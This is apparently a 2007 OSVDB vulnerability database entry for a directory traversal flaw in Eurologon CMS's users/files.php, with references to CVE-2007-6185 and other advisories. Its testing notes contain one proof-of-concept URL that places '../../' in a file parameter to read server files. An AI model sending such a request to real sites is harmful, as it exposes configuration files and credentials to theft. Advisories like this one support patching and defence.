Eurologon CMS users/files.php file Variable Traversal Remote Arbitrary File Access

2007-11-27T00:00:00
ID OSVDB:39685
Type osvdb
Reporter OSVDB
Modified 2007-11-27T00:00:00

Description

Manual Testing Notes

http://[target]/users/files.php?mode=download&file=../../application.php

References:

ISS X-Force ID: 38659 Generic Exploit URL: http://www.milw0rm.com/exploits/4666 CVE-2007-6185 Bugtraq ID: 26600